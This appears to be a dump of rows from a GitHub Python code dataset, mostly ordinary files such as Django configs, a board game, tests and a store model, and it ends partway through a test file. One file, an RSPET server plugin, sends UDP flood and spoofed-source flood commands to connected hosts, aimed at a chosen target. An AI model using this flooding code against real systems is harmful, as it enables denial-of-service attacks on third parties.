blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
627745945b0f470a8f0c2173638f2a6876f3e8e8 | 132f602a34035037bb157b8c83fec7b8c5bbd967 | /article/migrations/0006_article_article_image.py | 56705d3613710a760286286f56be46f58c949847 | [] | no_license | burakkoroglu/blogapp | aa0a24bcfcf0920986d6bcb948441108ca9a9223 | b296b68ed9dd514250d4ac782702c44449830325 | refs/heads/main | 2023-03-29T17:22:37.643845 | 2021-03-31T20:45:45 | 2021-03-31T20:45:45 | 353,485,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 456 | py | # Generated by Django 3.1.7 on 2021-03-30 20:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('article', '0005_auto_20210330_2143'),
]
operations = [
migrations.AddField(
model_name='article',
name='article_image',
field=models.FileField(blank=True, null=True, upload_to='', verbose_name='Makaleye Fotograf ekleyin'),
),
]
| [
"burakkoroglu200052@gmail.com"
] | burakkoroglu200052@gmail.com |
fa39344f8d4e8ce35c807e8f98786b7b6f061a8c | c50a1348addcfda57342b7141e2a6b821e2a38d9 | /stonehenge_game.py | e32b3fdf4d944fbde9f2d68a53c40328c3e35e91 | [] | no_license | KG-UT/game-files | edc3f2a87a7739745a17d8075c203904629fdb8c | ba07bd54259a7d96b75159d778f227c6b6a89f99 | refs/heads/master | 2021-08-05T04:12:44.324387 | 2019-01-09T06:50:32 | 2019-01-09T06:50:32 | 136,755,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,788 | py | """StoneHenge game. Subclass of game."""
from game import Game
from stonehenge_state_4 import StonehengeState
class Stonehenge(Game):
"""Implementation of the game Stonehenge."""
current_state: StonehengeState
def __init__(self, p1_starts: bool) -> None:
"""initializes the game Stonehenge."""
side_length = int(input("What side length board do you want?: "))
n = side_length + 1
all_rows = []
ascii_stuff = 64
for row in range(side_length):
new_row = []
num_slots = 2
while num_slots != row+4:
ascii_stuff += 1
new_row.append(chr(ascii_stuff))
num_slots += 1
all_rows.append(new_row)
new_row = []
num_slots = 0
while num_slots != side_length:
ascii_stuff += 1
new_row.append(chr(ascii_stuff))
num_slots += 1
all_rows.append(new_row)
for row in all_rows:
row.insert(0, '@')
all_rows.insert(0, ['@']*n)
all_rows.append(['@']*n)
self.current_state = StonehengeState(p1_starts, all_rows)
def get_instructions(self) -> str:
"""returns the instruction to the game."""
instructions = """Players take turns occupying cells. A player
gets a leyline when they occupy at least half of the cells
in a line associated with a leyline. There is a leyline
for each unique diagonal and horizontal line on the grid.
The player who gains half of the leylines first wins."""
return instructions
def is_over(self, state: StonehengeState) -> bool:
"""return if the game is over."""
if state.get_possible_moves() == []:
return True
leylines = state.get_points()
if leylines[True] >= leylines[2]/2:
return True
if leylines[False] >= leylines[2]/2:
return True
return False
def is_winner(self, player: str) -> bool:
"""return whether player is the winner of the game"""
if self.is_over(self.current_state):
leylines = self.current_state.get_points()
if (player == 'p1' and
leylines[True] >= leylines[2]/2):
return True
elif (player == 'p2' and
leylines[False] >= leylines[2]/2):
return True
return False
def str_to_move(self, string: str) -> str:
"""turns a string into a move that can
be accepted by self.state"""
return string
if __name__ == '__main__':
from python_ta import check_all
check_all(config="a2_pyta.txt")
x = Stonehenge(True)
print(x.current_state)
| [
"noreply@github.com"
] | noreply@github.com |
e55166ca9c432b519f2b37f9fcbc65f2d7f3b754 | 7d8d506923361f7e6b2f8653b5d149b160128fe2 | /quizproject/urls.py | cc61281e0c82380759f7ee4c21b2ef661b9b0df1 | [] | no_license | satish17s/quizproject | 48a8884bb499c59501ca438a40433485da85c4cf | 58f462b86032b8ddfa580c453753144c8404da92 | refs/heads/master | 2022-12-15T04:51:27.442684 | 2020-09-15T17:56:07 | 2020-09-15T17:56:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | """quizproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,re_path
from triviaapp import views
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('',views.getname,name='getname'),
path('playgame',views.playgame,name='playgame'),
# re_path('question1',views.question1,name='question1'),
re_path('question/(?P<pk>\d+)/$',views.question,name='question'),
path('summary',views.summary,name='summary'),
path('history',views.history,name='history'),
]
| [
"satishsharma.cse@gmail.com"
] | satishsharma.cse@gmail.com |
1a9d4801ecc2db4d58bf854ae7c85e88b3f93d32 | cbe3cb352a7512ef4ef4ea1c4e3ab5719da95e6e | /day0209/code7_12.py | 94b069e1bbb08ba5eb116a6e0a98c5505d58b024 | [] | no_license | kyousuke-s/PythonTraining | 10fdc374bc637a3d2f1ff7315cc53f1fda27fabd | 6c3a3d9652765e79045cff99f713ac244b10b391 | refs/heads/master | 2023-03-05T20:33:24.704648 | 2021-02-16T00:12:08 | 2021-02-16T00:12:08 | 338,927,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | import matplotlib.pyplot as plt
weight = [68.4,68.0,70.2,76.7,56.6,68.9,65.7,66.6]
plt.plot(weight)
plt.show()
| [
"kyousukesato8@gmail.com"
] | kyousukesato8@gmail.com |
dc26b2731cb16eb441a4a54b65c066c486e0c57f | d3f484a7be524f71f4614b242d2649364b981536 | /day-01/part1.py | 1b3eca902a2c5c005c61c17f2a6311f115097701 | [] | no_license | NISH1001/advent-of-code-2018 | 581ce4466594c412b820599bf6dc5fb5d9f200a9 | a4eaa35265afca0318c769335d46dd6ccc77ad0a | refs/heads/master | 2020-04-09T04:00:09.910278 | 2018-12-11T05:49:46 | 2018-12-11T05:49:46 | 160,006,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | #!/usr/bin/env python3
def main():
with open('input') as f:
res = sum([ int(line) for line in f])
print(res)
if __name__ == "__main__":
main()
| [
"nishanpantha@gmail.com"
] | nishanpantha@gmail.com |
c71a372a975e84cfa1beca53766244361b5b5f77 | c06b6c0eb8274f73b78c82c2a9c9b3428931ef5d | /models/store.py | c0ce4f50880cc46b24bf358e376a948d72e85324 | [] | no_license | aleksandar89bt/Python-REST-API-with-flask | 943dfc038b199070dcdd0846b952c257cb7f69e8 | 3feb5a639d3ccb2a38eca27bd316680eae57a77b | refs/heads/master | 2020-09-13T13:39:00.466987 | 2019-11-20T21:38:49 | 2019-11-20T21:38:49 | 222,801,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | from db import db
class StoreModel(db.Model):
__tablename__ = 'stores'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80))
items = db.relationship('ItemModel', lazy='dynamic')
def __init__(self, name):
self.name = name
def json(self):
return {"name": self.name, "items": [item.json() for item in self.items.all()]}
@classmethod
def find_by_name(cls, name):
return cls.query.filter_by(name=name).first()
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
db.session.delete(self)
db.session.commit()
| [
"aleksandar89bt@hotmail.com"
] | aleksandar89bt@hotmail.com |
52dd599df6e77fd91779278402d371535e57b18a | b7ad5a09bbf48a058ca83d92d11159f30f9726ef | /plugins/udp.py | 618943d7b2a4a4dda1ca89ad4a0b6b77ecf8b362 | [] | no_license | RSPET/rspet.github.io | 71a619ff4cec67b4f6870b7032a4d190690f8a80 | 115c693155e817b0819961a32cca97d6941063d7 | refs/heads/master | 2020-09-21T05:00:28.735926 | 2017-10-29T12:12:14 | 2017-10-29T12:12:14 | 66,701,178 | 0 | 1 | null | 2017-10-29T12:08:37 | 2016-08-27T07:06:54 | CSS | UTF-8 | Python | false | false | 2,788 | py | """
Plug-in module for RSPET server. Offer functions related to udp flooding.
"""
from __future__ import print_function
from socket import error as sock_error
from Plugins.mount import Plugin
class Files(Plugin):
"""
Class expanding Plugin.
"""
__server_commands__ = {}
__cmd_help__ = {}
def __init__(self):
"""
Declare plugin's CLI commands their syntax and their scope.
"""
self.__server_commands__["UDP_Flood"] = [self.udp_flood, "connected",
"multiple"]
self.__cmd_help__["UDP_Flood"] =\
"UDP_Flood <target_ip> <target_port> [payload]"
self.__server_commands__["UDP_Spoof"] = [self.udp_spoof, "connected",
"multiple"]
self.__cmd_help__["UDP_Spoof"] =\
"UDP_Spoof <target_ip> <target_port> <spoofed_ip> <spoofed_port> [payload]"
def udp_flood(self, server, args):
"""Flood target machine with UDP packets."""
ret = [None,0,""]
hosts = server.get_selected()
if len(args) < 2:
ret[2] = ("Syntax : %s" % self.__cmd_help__["UDP_Flood"])
ret[1] = 1 # Invalid Syntax Error Code
else:
try:
# IP:port:payload
cmd = "%s:%s:%s" % (args[0], args[1], args[2])
except IndexError:
cmd = "%s:%s:Hi" % (args[0], args[1])
for host in hosts:
try:
host.send(host.command_dict['udpFlood'])
host.send("%03d" % len(cmd))
host.send(cmd)
except sock_error:
host.purge()
ret[0] = "basic"
ret[1] = 2 # Socket Error Code
return ret
def udp_spoof(self, server, args):
"""Flood target machine with UDP packets via spoofed ip & port."""
ret = [None,0,""]
hosts = server.get_selected()
if len(args) < 4:
ret[2] = ("Syntax : %s" % self.__cmd_help__["UDP_Spoof"])
ret[1] = 1 # Invalid Syntax Error Code
else:
try:
# IP:port:new_ip:new_port:payload
cmd = "%s:%s:%s:%s:%s" % (args[0], args[1], args[2], args[3], args[4])
except IndexError:
cmd = "%s:%s:%s:%s:Hi" % (args[0], args[1], args[2], args[3])
for host in hosts:
try:
host.send(host.command_dict['udpSpoof'])
host.send("%03d" % len(cmd))
host.send(cmd)
except sock_error:
host.purge()
ret[0] = "basic"
ret[1] = 2 # Socket Error Code
return ret
| [
"panos122008@gmail.com"
] | panos122008@gmail.com |
d64da185dd8fee430d47d7f3bce31fb57e9bbee4 | 823add886f95b79f806429f46f8c1aa5f0dd92c1 | /dbdjd/venv/bin/pip3 | ba65a2918183519c2fc2796728d451a7ea0c0de1 | [] | no_license | lpgph/python | e3a5e320aa1625b6f4bc0d01389349fa5b5fff2c | 84f88b4623f482ed3af14a21c78c62818268576a | refs/heads/master | 2022-08-29T12:54:08.790123 | 2020-05-28T10:26:14 | 2020-05-28T10:26:14 | 64,984,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/lpgph/Public/Work/python/dbdjd/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"penghui.guo@outlook.com"
] | penghui.guo@outlook.com | |
4575d970e83e1f8dc41172f9fac691d384b2aeed | 1afa27fd4084cd704e99d8d0b17b6b2f6ee15a32 | /manage.py | 68852e0bcf6807e5d9778fadda506484cbc49aa7 | [] | no_license | brandon30Last/Portfolio-Project | 9124aa803a5fab07f0c07ed46c9f396a9d2c4b8c | b04ea7655fee848a2ecea050cb8b89a68a3d3128 | refs/heads/master | 2022-11-07T15:16:38.086674 | 2020-06-03T19:43:44 | 2020-06-03T19:43:44 | 269,091,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'PortfolioMain.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"brandon30last@gmail.com"
] | brandon30last@gmail.com |
456c2b78de112d96dc0c73cfd9ab785781b0d05e | dffc22d31c2d2d1d6e364d910bc4b2b709f5b344 | /manage.py | 8e8f1123812c7e508868224ff66c52525d6a3558 | [] | no_license | dolastack/rssfeed | adeb85da802090924d450355f34e9c3e2d1f3c31 | 8543b3b97bf2e73627341353b6083deb842831f1 | refs/heads/master | 2021-01-21T17:06:52.820027 | 2017-07-08T02:45:59 | 2017-07-08T02:45:59 | 91,932,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "rssfeed.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"india@ubuntu.dolastack.com"
] | india@ubuntu.dolastack.com |
657df645b7c4a352581d802e29ead9bbcc0e831d | 1b1158b51eb508f8712eddfb8730d468d824cf07 | /screening_task/urls.py | 39375aed0f824b5576e490fea9837d0a59673f6a | [] | no_license | BesnardConsultingSAS/django-screening | cadb658156c57edbc0294a756884880572ce24d3 | ff5110e37a4fd7aea7f20dc97dffa51ab019ac4e | refs/heads/master | 2022-12-09T16:53:32.857074 | 2020-08-11T14:20:40 | 2020-08-18T12:16:02 | 286,722,456 | 0 | 0 | null | 2020-09-14T11:28:06 | 2020-08-11T11:08:52 | Python | UTF-8 | Python | false | false | 1,211 | py | """screening_task URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/dev/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, include
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from rest_framework import permissions
urlpatterns = [
path("agile/", include("agile.urls")),
]
schema_view = get_schema_view(
openapi.Info(
title="LASSI API", default_version="v1", description="LASSI API Documentation",
),
public=True,
permission_classes=(permissions.AllowAny,),
)
urlpatterns += [
path(
"api-docs/",
schema_view.with_ui("swagger", cache_timeout=0),
name="schema-swagger-ui",
),
]
| [
"contact@besnard-consulting.com"
] | contact@besnard-consulting.com |
83530addf4bdcb1e897e3ff6b44c9a664f8df6c3 | 880e49e43653a61f22df428aed02571177721c72 | /doubleDB/routers.py | ed206c1562f70d39b86f41452627f647b0649ecf | [] | no_license | lacosmok/doubledb | 30e9115554bce32bcf46a7ab1c47a23b0c26309b | 3cbf9a064abc54b71613d86541e1e2b524b70da2 | refs/heads/master | 2020-03-20T21:58:41.440766 | 2018-06-18T22:44:34 | 2018-06-18T22:44:34 | 137,772,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 703 | py |
class PrimaryRouter:
def db_for_read(self, model, **hints):
"""
Reads depending on type
"""
return 'default'
def db_for_write(self, model, **hints):
"""
Writes always go to primary.
"""
# print(hints['instance'].type)
if hints['instance'].default_database:
return 'default'
else:
return 'seconddb'
def allow_relation(self, obj1, obj2, **hints):
"""
For now nothing
"""
return 'default'
def allow_migrate(self, db, app_label, model_name=None, **hints):
"""
All non-auth models end up in this pool.
"""
return True
| [
"lacosmok@gmail.com"
] | lacosmok@gmail.com |
17751572ebd1d61ba26c0d2bd99c9e79125c6933 | 511d9f8eeb89e26cb3901d8ce8f656e4c3a23c42 | /src/program3Test.py | 99ca4cb3d116d419767bad4b88d485eaaf5b82bf | [] | no_license | tiansiyu0210/Python-hw3 | 166475c79a0895e8d55923da4138cd177df4a511 | d86d15b3abe5a20c83f7326af0c0eb4ca73bf7d3 | refs/heads/master | 2020-04-05T13:24:29.867968 | 2018-11-11T02:51:02 | 2018-11-11T02:51:02 | 156,901,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,128 | py | import unittest
from src import program3
class Program3Test(unittest.TestCase):
def test_case_1(self):
test = program3.CreditCard()
self.assertTrue(test.isValid('371232345686516'))
def test_case_2(self):
test = program3.CreditCard()
self.assertFalse(test.isValid('371232345686546'))
def test_case_3(self):
test = program3.CreditCard()
self.assertTrue(test.isValid('41232345683411'))
def test_case_4(self):
test = program3.CreditCard()
self.assertFalse(test.isValid('41232345683412'))
def test_case_5(self):
test = program3.CreditCard()
self.assertTrue(test.isValid('51232345686544'))
def test_case_6(self):
test = program3.CreditCard()
self.assertFalse(test.isValid('51232345686547'))
def test_case_7(self):
test = program3.CreditCard()
self.assertTrue(test.isValid('61232345686542'))
def test_case_8(self):
test = program3.CreditCard()
self.assertFalse(test.isValid('61232345686547'))
if __name__ == '__main__':
unittest.main()
p3t= Program3Test()
| [
"tiansiyu297@gmail.com"
] | tiansiyu297@gmail.com |
b028d6e77fbcf0591d0e14ba348002c534cdc523 | 7670a25a77f418ac5ed9728bb276c1848b0467c5 | /tests/test_model.py | 2a7435561a34b4ea54634c913a202487214ff18e | [] | no_license | rhzphlv/deploying_model | f9aef3da360160c519197c51bd97f8c696a42a2e | a4bfb2299aa5e629d42c3fca0a779570a26dc9b5 | refs/heads/main | 2023-03-30T13:26:49.683384 | 2021-03-23T20:29:51 | 2021-03-23T20:29:51 | 350,238,206 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 774 | py | from deployment_model.predict import make_prediction
from deployment_model.processing.data_management import load_test_set
from deployment_model.config import config
import math
def test_single_value():
#Given
test_data = load_test_set(filename = config.TEST_DATA)
json_test = test_data[0:2].to_json(orient = 'records')
#When
subject = make_prediction(input_data = json_test)
#Then
assert subject is not None
assert isinstance(subject.get('predictions')[0],float)
def test_validation():
#Given
test_data = load_test_set(filename = config.TEST_DATA)
json_test = test_data.to_json(orient = 'records')
#When
subject = make_prediction(input_data = json_test)
#Then
#num of row after dropping NA values = 566
assert len(subject.get('predictions')) == 566
| [
"rheza.jogja@gmail.com"
] | rheza.jogja@gmail.com |
a8f68a8dd54e0a5b800694a854a7f8df626bd445 | 1bbde263e4691d0fa71d2f68561a8c5013a39544 | /Epic6/test_app.py | 59fb8889866be35d2396ad28e3732a69082bcdaa | [] | no_license | robbm96/InCollege-Project | fc510d87c8d1e99a12cb6d83a1726058e437eb2f | f32a413f67d687d69cd5258adcb216f14a962fc9 | refs/heads/main | 2023-01-01T21:52:52.782471 | 2020-10-25T23:44:00 | 2020-10-25T23:44:00 | 306,399,189 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,374 | py | # This file contains all our pytest
# Import every method/variable from our app file
from app import *
import json
print("Starting test")
def test_user_option():
option = get_user_option(1, 3)
assert isinstance(option, int)
assert option <= 5 and option >= 1
def test_verify_password():
acceptable_passwords = [
"tahirMon@1",
"hoanGngu@12",
"joRgo(76"
]
invalid_passwords = [
"tahirMo",
"hoangnguy@",
"jorgoK76",
"invalid",
"inV#lid"
]
for password in acceptable_passwords:
assert verify_password(password) == True
for password in invalid_passwords:
assert verify_password(password) == False
# initializes empty database
with open("test_database.json", 'w+') as db:
init_db = {
"users": []
}
json.dump(init_db, db)
db.close()
def test_login_and_register():
valid_fake_users = [
{"username": "newUser46", "password": "tahirMon@1",
"first_name": "John", "last_name": "Cena"},
{"username": "newUser47", "password": "hoanGngu@12",
"first_name": "The", "last_name": "Rock"},
{"username": "newUser48",
"password": "joRgo(76", "first_name": "Elon", "last_name": "Musk"},
{"username": "newUser49", "password": "newUser4@",
"first_name": "Steve", "last_name": "Jobs"},
{"username": "newUser50", "password": "newUser4$",
"first_name": "Bill", "last_name": "Gates"},
]
for user in valid_fake_users:
assert verify_register(user["username"], user["password"], user["first_name"],
user["last_name"], database="test_database.json") == True
assert login(user["username"], user["password"],
database="test_database.json") == True # verify_login
# lets now delete user and test that we can't register a user that doesnt have unique username and first/last name
with open("test_database.json", 'r') as db:
data = json.load(db)
db.close()
with open("test_database.json", 'w+') as db:
data["users"].pop()
json.dump(data, db)
db.close()
for i in range(4):
assert verify_register(valid_fake_users[i]["username"], valid_fake_users[i]["password"], valid_fake_users[i]
["first_name"], valid_fake_users[i]["last_name"], database="test_database.json") == False
# Insert the user that was deleted so it is full again
assert verify_register(valid_fake_users[4]["username"], valid_fake_users[4]["password"], valid_fake_users[4]
["first_name"], valid_fake_users[4]["last_name"], database="test_database.json") == True
def test_skills_options():
options = list_of_skills()
assert options[0] <= 6 and options[0] >= 1
if options[0] == 1:
assert options[1] == "1.) Programming"
if options[0] == 2:
assert options[1] == "2.) Carpentry"
if options[0] == 3:
assert options[1] == "3.) Photography"
if options[0] == 4:
assert options[1] == "4.) Microsoft Excel"
if options[0] == 5:
assert options[1] == "5.) Learn Spanish"
if options[0] == 6:
assert options[1] == "6.) Exit"
def test_post_job():
valid_fake_jobs = [
["", "", "", "", ""],
["Mover", "Help clients move to new house",
"Bulls Moving Co.", "Tampa, FL", 10],
["Developer", "Develop new state of the art software at our company!",
"Apple", "San Francisco, CA", "hudred thousand dollars"],
["Professor", "None", "USF", "Tampa, FL", 80000],
]
new_job = ["Janitor", "Clean the mess of the future generation of engineers",
"USF", "Tampa, FL", "25 dollars an hours"]
invalid_fake_jobs = [
[None, "Help clients move to new house",
"Bulls Moving Co.", "Tampa, Fl", 10],
["Professor", None, "USF", "Tampa, Fl", 80000],
[None, "Clean the mess of the future generation of engineers",
"USF", "Tampa, FL", None],
]
# Test invalid jobs
for i in range(len(invalid_fake_jobs)):
assert post_job(invalid_fake_jobs[i][0], invalid_fake_jobs[i][1], invalid_fake_jobs[i][2],
invalid_fake_jobs[i][3], invalid_fake_jobs[i][4], database="test_database.json") == [False, 500]
# Login each user to Test valid job postings
with open("test_database.json", "r") as db:
data = json.load(db)
db.close()
i = 0
for user in data["users"]:
login(user["username"], user["password"],
database="test_database.json")
if i == 4: # Test limit of 4 jobs
assert post_job(new_job[0], new_job[1], new_job[2], new_job[3],
new_job[4], database="test_database.json") == [False, 404]
else: # Test valid jobs
assert post_job(valid_fake_jobs[i][0], valid_fake_jobs[i][1], valid_fake_jobs[i][2],
valid_fake_jobs[i][3], valid_fake_jobs[i][4], database="test_database.json") == [True, 200]
i += 1
def test_find_user():
valid_fake_users = [
{"username": "newUser46", "password": "tahirMon@1",
"first_name": "John", "last_name": "Cena"},
{"username": "newUser47", "password": "hoanGngu@12",
"first_name": "The", "last_name": "Rock"},
{"username": "newUser48",
"password": "joRgo(76", "first_name": "Elon", "last_name": "Musk"},
{"username": "newUser49", "password": "newUser4@",
"first_name": "Steve", "last_name": "Jobs"},
{"username": "newUser50", "password": "newUser4$",
"first_name": "Bill", "last_name": "Gates"},
]
invalid_fake_users = [
{"username": "newUser44", "password": "tahirM3on@1",
"first_name": "Johns", "last_name": "Qen"},
{"username": "newUser42", "password": "hoanGn3gu@12",
"first_name": "Thes", "last_name": "Rocky"},
{"username": "newUser41",
"password": "joRgo2(76", "first_name": "Elona", "last_name": "Musq"},
{"username": "newUser4", "password": "newUser14@",
"first_name": "Steven", "last_name": "Job"},
{"username": "newUser510", "password": "newU1ser4$",
"first_name": "Billy", "last_name": "Gate"},
]
for user in invalid_fake_users:
assert find_user(user["first_name"], user["last_name"],
database="test_database.json") == False
with open("test_database.json", "r") as db:
data = json.load(db)
db.close()
for user in data["users"]:
assert find_user(user["first_name"], user["last_name"],
database="test_database.json") == True
def test_useful_links():
### CANNOT TEST SIGNUP OPTION, WILL FAIL BECAUSE OF EXTRA NEEDED INPUT ###
# Delete a user if database is full to test the sign up option
# with open("database.json", 'r') as db:
# data = json.load(db)
# db.close()
# with open("database.json", 'w+') as db:
# data["users"].pop()
# json.dump(data, db)
# db.close()
options = print_useful_links()
if options == 1:
assert options == """
--Available Options--
1.) Sign Up
2.) Help Center
3.) About
4.) Press
5.) Blog
6.) Careers
7.) Developers
8.) Go Back
"""
# Not sure how to test the signup option
# if options == 1:
# assert options == True
if options == 2:
assert options == "We're here to help"
if options == 3:
assert options == "InCollege: Welcome to InCollege, the world's largest college student network with many users in many countries and territories worldwide"
if options == 4:
assert options == "InCollege Pressroom: Stay on top of the latest news, updates, and reports"
if options == 5:
assert options == "Under Construction"
if options == 6:
assert options == "Under Construction"
if options == 7:
assert options == "Under Construction"
if options == 8:
assert options == False # "Going back to 'Useful Links' Menu"
if options == 2:
assert options == "Under Construction"
if options == 3:
assert options == "Under Construction"
if options == 4:
assert options == "Under Construction"
if options == 5:
assert options == False
# Tried to test automatic input for signup but tests kept failing, tried nested mocks but still failed
# with mock.patch.object(builtins, 'input', lambda _: 1):
# assert print_useful_links()
# with mock.patch.object(builtins, 'input', lambda _: '1'):
# assert print_useful_links()
# with mock.patch.object(builtins, 'input', lambda _: 'Bernie'):
# assert print_useful_links()
# with mock.patch.object(builtins, 'input', lambda _: 'Sanders'):
# assert print_useful_links()
# with mock.patch.object(builtins, 'input', lambda _: 'Sandman'):
# assert print_useful_links()
# with mock.patch.object(builtins, 'input', lambda _: "S@ndm@n69*"):
# assert print_useful_links()
# with mock.patch.object(builtins, 'input', lambda _: '8'):
# assert print_useful_links()
# with mock.patch.object(builtins, 'input', lambda _: '5'):
# assert print_useful_links() == False
def test_privacy_policy():
# empty the database
with open("test_database.json", 'w+') as db:
init_db = {
"users": []
}
json.dump(init_db, db)
db.close()
fake_user = {"username": "newUser46", "password": "tahirMon@1",
"first_name": "John", "last_name": "Cena"}
assert verify_register(fake_user["username"], fake_user["password"],
fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
LOGGED_IN_USER
assert login(fake_user["username"],
fake_user["password"], "test_database.json") == True
assert toggle_privacy(
LOGGED_IN_USER["username"], "test_database.json") == True
with open("test_database.json", "r") as db:
data = json.load(db)
for user in data["users"]:
if user["username"] == LOGGED_IN_USER["username"]:
assert isinstance(user["settings"]["email"], bool)
assert isinstance(user["settings"]["sms"], bool)
assert isinstance(user["settings"]["targeted_ads"], bool)
assert isinstance(user["settings"]["language"], str)
assert user["settings"]["email"] == False or user["settings"]["email"] == True
assert user["settings"]["sms"] == False or user["settings"]["sms"] == True
assert user["settings"]["targeted_ads"] == False or user["settings"]["targeted_ads"] == True
assert user["settings"]["language"] == "English" or user["settings"]["language"] == "Spanish"
db.close()
def test_upper_case_func():
lowercase_majors = [
"Computer science",
"computer engineering",
"biology",
"chemical engineering",
"fake major with five words"
]
assert upper_case(lowercase_majors[0]) == "Computer Science"
assert upper_case(lowercase_majors[1]) == "Computer Engineering"
assert upper_case(lowercase_majors[2]) == "Biology"
assert upper_case(lowercase_majors[3]) == "Chemical Engineering"
assert upper_case(lowercase_majors[4]) == "Fake Major With Five Words"
def test_creating_profile():
with open("test_database.json", 'w+') as db:
init_db = {
"users": []
}
json.dump(init_db, db)
db.close()
profile_1 = {
"title": "Senior",
"major": upper_case("computer science"),
"university": upper_case("university of south florida"),
"about": "test friend",
"experience": [
{
"title": "Customer relation director",
"employer": "Burgerking",
"date_started": "6/9/2006",
"date_ended": "6/9/2009",
"location": "Tampa",
"description": "Handle and fulfill customer's request"
}
],
"education": [
{
"school": "USF",
"degree": "Undergrad",
"years_att": "2069"
}
]
}
fake_user = {"username": "newUser46", "password": "tahirMon@1",
"first_name": "John", "last_name": "Cena"}
assert verify_register(fake_user["username"], fake_user["password"],
fake_user["first_name"], fake_user["last_name"], "test_database.json") == True
LOGGED_IN_USER
assert login(fake_user["username"],
fake_user["password"], "test_database.json") == True
assert post_title(profile_1["title"], profile_1["major"], profile_1["university"], profile_1["about"],
profile_1["experience"], profile_1["education"], "test_database.json")[0] == True
with open("test_database.json", 'r') as db:
data = json.load(db)
for user in data["users"]:
if user.get("posted_title"): # Only verify is user has created a profile
# Verify major is capitalized
major = user["posted_title"]["major"].split()
assert (x.isupper() for x in major)
# Verify university is capatilized
university = user["posted_title"]["university"].split()
assert (x.isupper() for x in university)
# Verify experience is more than 3
experience_length = len(user["posted_title"]["experience"])
assert experience_length >= 0 and experience_length <= 3
def test_profile_view():
with open("test_database.json", 'w+') as db:
init_db = {
"users": []
}
json.dump(init_db, db)
db.close()
profile_1 = {
"title": "Senior",
"major": "Computer Science",
"university": "USF",
"about": "test 2",
"experience": [
{
"title": "Customer relation director",
"employer": "McDonald's",
"date_started": "6/9/2006",
"date_ended": "6/9/2009",
"location": "Tampa",
"description": "Handle and fulfill customer's request"
}
],
"education": [
{
"school": "USF",
"degree": "Undergrad",
"years_att": "2020"
}
]
}
profile_2 = {
"title": "Senior",
"major": "Computer Science",
"university": "USF",
"about": "test 2",
"experience": [
{
"title": "Customer relation director",
"employer": "McDonald's",
"date_started": "6/9/2006",
"date_ended": "6/9/2009",
"location": "Tampa",
"description": "Handle and fulfill customer's request"
}
],
"education": [
{
"school": "USF",
"degree": "Undergrad",
